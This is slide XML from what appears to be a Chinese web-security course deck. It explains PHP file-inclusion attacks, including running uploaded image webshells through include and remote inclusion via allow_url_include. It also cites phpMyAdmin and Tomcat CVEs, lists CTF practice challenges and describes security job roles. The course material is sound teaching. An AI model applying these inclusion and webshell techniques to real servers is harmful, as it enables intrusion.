        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1266825" y="1319530"/>
            <a:ext cx="9843770" cy="922020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>pikachu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>靶场</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>远程文件包含条件：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>php.ini  allow_url_include=On</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="501015" y="2282825"/>
            <a:ext cx="10741025" cy="2011045"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="544195" y="4790440"/>
            <a:ext cx="10697210" cy="18834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00760" y="1456055"/>
            <a:ext cx="10543540" cy="1476375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>（超文本传输协议，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Hypertext Transfer Protocol </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>是一种应用层协议，用于在客户端和服务器之间传递数据。</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的基本工作原理是客户端（通常是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>浏览器）向服务器发送请求，服务器接收到请求后，返回相应的资源。这些资源可以是网页、图像、音频文件、视频等。</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>使用了客户端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>服务器模型，其中客户端发送请求，服务器返回响应。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2281555" y="3282950"/>
            <a:ext cx="6801485" cy="29718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91590" y="559435"/>
            <a:ext cx="4064000" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>文件上传</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>文件包含</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="834390" y="1381760"/>
            <a:ext cx="10747375" cy="2030095"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>在文件上传中，我们有时候会上传图片马，但是图片马往往不能直接被解析。之前我们会结合</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>.htaccess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.user.ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>等方式来利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图片马。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>但是，如果我们找到了文件包含点的话，就能通过文件包含的方式直接利用图片</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>马。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>原理就是，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>php include </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>会将被包含的文件当作</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>代码，而图片马中是有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>代码的，所以能够直接被</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>执行。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="4349115"/>
            <a:ext cx="8656955" cy="1476375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>CVE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>典型案例：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>CVE-2018-12613 PHPMyAdmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>后台</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>任意文件包含漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:hlinkClick r:id="rId1" action="ppaction://hlinkfile"/>
              </a:rPr>
              <a:t>D:\BaiduSyncdisk\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:hlinkClick r:id="rId1" action="ppaction://hlinkfile"/>
              </a:rPr>
              <a:t>大学资料</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:hlinkClick r:id="rId1" action="ppaction://hlinkfile"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:hlinkClick r:id="rId1" action="ppaction://hlinkfile"/>
              </a:rPr>
              <a:t>第五学期</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:hlinkClick r:id="rId1" action="ppaction://hlinkfile"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:hlinkClick r:id="rId1" action="ppaction://hlinkfile"/>
              </a:rPr>
              <a:t>小学期</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:hlinkClick r:id="rId1" action="ppaction://hlinkfile"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:hlinkClick r:id="rId1" action="ppaction://hlinkfile"/>
              </a:rPr>
              <a:t>第一次作业</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:hlinkClick r:id="rId1" action="ppaction://hlinkfile"/>
              </a:rPr>
              <a:t>\CVE-2018-12613\phpmyadmin 4.8.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:hlinkClick r:id="rId1" action="ppaction://hlinkfile"/>
              </a:rPr>
              <a:t>远程文件包含漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:hlinkClick r:id="rId1" action="ppaction://hlinkfile"/>
              </a:rPr>
              <a:t>.md</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>CVE-2020-1938 Apache Tomcat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>文件包含漏洞</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45895" y="547370"/>
            <a:ext cx="4064000" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>文件包含相关函数</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1531620" y="1362710"/>
            <a:ext cx="5949950" cy="1981200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1514475" y="3429000"/>
            <a:ext cx="5955030" cy="22593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268095" y="1188720"/>
            <a:ext cx="7891780" cy="5565140"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1501775" y="491490"/>
            <a:ext cx="4064000" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>伪协议</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="755015" y="3810635"/>
            <a:ext cx="9829800" cy="2266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10945" y="478790"/>
            <a:ext cx="4064000" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>练习时间</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1210945" y="1691005"/>
            <a:ext cx="8212455" cy="922020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻防世界</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>-Web_php_include</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻防世界</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>-fileclude</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>bugku-https://ctf.bugku.com/challenges/detail/id/102.html</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8675" y="2803525"/>
            <a:ext cx="5435600" cy="752475"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1.6.web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>安全相关岗位</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>简介</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86815" y="541020"/>
            <a:ext cx="4064000" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>甲方</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t> vs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>乙方</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1016000" y="1313180"/>
            <a:ext cx="10495915" cy="3415030"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>甲乙方安全的区别是做谁的安全。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>甲方就是做自己的安全，乙方就是做别人的安全</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>甲方是通过信息安全产品、安全服务给自己的主营业务保驾护航，除此之外还需要内部建设全面的信息安全管理制度，通过流程卡点赋能、安全体系建设来规避安全风险；而乙方本身自己的业务就是信息安全产品和服务。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>甲方重心：通过信息安全技术来确保自身业务的信息安全，从而赋能业务。甲方安全团队如：拼多多、京东、建设银行、华泰证券等</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>......</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>乙方重心：通过提供信息安全技术来帮助甲方保护业务的信息安全，从而获取商业回报。乙方安全团队如：天融信、深信服、奇安信、知道创宇、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>绿盟等安全厂商，当然也包括一些安全集成商。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="845820" y="5039995"/>
            <a:ext cx="10500360" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>真实场景中并不存在甲方的工作岗位就一定比乙方好，或者乙方一定要</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>跪舔</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>甲方的说法。平台的选择、工作岗位的选择都取决于自己更擅长什么、想要往什么方向发展。</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79525" y="509270"/>
            <a:ext cx="4064000" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>甲方岗位</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="191135" y="1201420"/>
            <a:ext cx="11847830" cy="5773420"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1"/>
              <a:t>数据安全治理工程师</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>：以数据安全为维度，对公司业务数据安全进行治理，包括但不限于数据安全生命周期规范、数据分级分类、数据披露审核等，从数据安全治理的角度对组织实施整体的数据安全保护措施。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1"/>
              <a:t>安全架构师</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1"/>
              <a:t>安全专家</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>：某个方向的资深人员，架构能力强、专业能力强，负责某个方向的整体建设。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1"/>
              <a:t>安全合规工程师</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>：偏合规管理，主要是从等级保护、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>ISO27001</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>、括上市</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>IPO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>网数合规审计、各种安全审查、法律法规等各种信息安全管理体系以及监管方向进行相关建设。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>SDL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>工程师（应用安全工程师）：技能偏应用系统，主要负责公司业务系统安全开发生命周期过程中的整体安全措施建设</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>SDL/devdecops</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>，比如安全测试、应用安全发布流程、应用系统漏洞的修复，有些团队还会细分为不同技术领域，比如客户端安全、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>APP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>安全等。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1"/>
              <a:t>安全开发工程师</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>：负责公司各个安全系统的开发，安全技能</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>写代码的能力（大部分</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>BOSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>都不希望将安全交给一个商业化产品一直管控，所以在甲方安全产品自研一直都是非常重要的）。</a:t>
            </a:r>
